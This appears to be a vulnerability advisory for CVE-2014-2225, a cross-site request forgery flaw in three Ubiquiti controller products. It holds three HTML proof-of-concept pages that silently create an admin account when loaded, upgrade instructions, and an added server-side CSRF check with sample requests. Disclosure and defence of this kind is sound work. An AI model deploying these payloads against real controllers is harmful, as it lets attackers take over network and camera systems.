# Vendor Homepage: (http://www.ubnt.com/)
# Tested on: Kali Linux

-----------------------------------------
Affected Products/Versions:
-----------------------------------------

UniFi Controller v2.4.6
mFi Controller v2.0.15
AirVision Controller v2.1.3
Note: Previous versions may be affected

-----------------
Description:
-----------------

Title: Cross-site Request Forgery (CSRF)
CVE: CVE-2014-2225
CWE: http://cwe.mitre.org/data/definitions/352.html
Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2225.html
Researcher: Seth Art - @sethsec

---------------
UniFi POC:
---------------

<html>
<head>
<script>
function sendCSRF()
{
  var url_base = "https://192.168.0.106:8443/api/add/admin"
  var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
  var xmlhttp;
  xmlhttp = new XMLHttpRequest();
  xmlhttp.open("POST", url_base, true);
  xmlhttp.setRequestHeader("Accept","*/*");
  xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded; charset=UTF-8");
  xmlhttp.withCredentials= "true";
  xmlhttp.send(post_data);
}
</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
<body onload="sendCSRF()">
</body>

-------------
mFi POC:
-------------

<html>
<head>
<script>
function sendCSRF()
{
  var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin"
  var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
  var xmlhttp;
  xmlhttp = new XMLHttpRequest();
  xmlhttp.open("POST", url_base, true);
  xmlhttp.setRequestHeader("Accept","*/*");
  xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded; charset=UTF-8");
  xmlhttp.withCredentials= "true";
  xmlhttp.send(post_data);
}
</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
<body onload="sendCSRF()">
</body>

--------------------
AirVision POC:
--------------------

<html>
<head>
<script>
function sendCSRF()
{
  var url_base = "https://192.168.0.106:7443/api/v2.0/admin"
  var post_data="{\"name\":\"csrf\",\"email\":\"csrf@gmail.com\",\"userGroup:\":\"admin\",\"x_password\":\"password\",\"confirmPassword\":\"password\",\"disabled\":\"false\"}"
  var xmlhttp;
  xmlhttp = new XMLHttpRequest();
  xmlhttp.open("POST", url_base, true);
  xmlhttp.setRequestHeader("Accept","*/*");
  xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8");
  xmlhttp.withCredentials= "true";
  xmlhttp.send(post_data);
}
</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
<body onload="sendCSRF()">
</body>

-------------
Solution:
-------------

UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater
mFi Controller - Upgrade to mFi Controller v2.0.24 or greater
AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater
(Note: The application name changed from AirVision to UniFi Video)
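
----------------------------------------
Server-side check (added example):
----------------------------------------

The requests in the POCs above carry the admin's session cookie but originate from another site and present no per-session secret. The check below is an added example, not part of the original advisory and not Ubiquiti's fix; the request shape, the X-CSRF-Token header name and the function names are assumptions made for illustration.

```javascript
// Added example: hypothetical server-side CSRF check, not Ubiquiti's code.
// A request is modelled as { method, headers, sessionToken }, with header
// names already lower-cased.
const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS"]);

function sameOrigin(value, expectedOrigin) {
  try {
    return new URL(value).origin === expectedOrigin;
  } catch (e) {
    return false; // missing or malformed Origin/Referer
  }
}

// Returns { allow, reason } for one request against the controller origin.
function checkRequest(req, expectedOrigin) {
  if (SAFE_METHODS.has(req.method.toUpperCase())) {
    return { allow: true, reason: "safe method" };
  }
  const h = req.headers;
  // 1. The browser-set Origin (Referer as fallback) must be the controller itself.
  const source = h["origin"] || h["referer"];
  if (!sameOrigin(source, expectedOrigin)) {
    return { allow: false, reason: "cross-origin or missing Origin/Referer" };
  }
  // 2. JSON API bodies must be declared as JSON; form and plain-text types
  //    are what a cross-site page can send without a CORS preflight.
  const type = (h["content-type"] || "").split(";")[0].trim().toLowerCase();
  if (type !== "application/json") {
    return { allow: false, reason: "unexpected content type" };
  }
  // 3. Per-session token in a custom header, which a foreign page cannot read.
  if (!req.sessionToken || h["x-csrf-token"] !== req.sessionToken) {
    return { allow: false, reason: "missing or wrong CSRF token" };
  }
  return { allow: true, reason: "ok" };
}

// Constructed sample requests (origin and token values are made up).
const CONTROLLER = "https://192.168.0.106:8443";
const forged = { method: "POST", sessionToken: "t0k3n-constructed",
  headers: { origin: "http://other-site.example",
             "content-type": "application/x-www-form-urlencoded; charset=UTF-8" } };
const legit = { method: "POST", sessionToken: "t0k3n-constructed",
  headers: { origin: CONTROLLER, "content-type": "application/json",
             "x-csrf-token": "t0k3n-constructed" } };
console.log(checkRequest(forged, CONTROLLER), checkRequest(legit, CONTROLLER));
```

Each of the three conditions fails independently for a forged request, so the token remains the deciding control even where a client omits Origin and Referer.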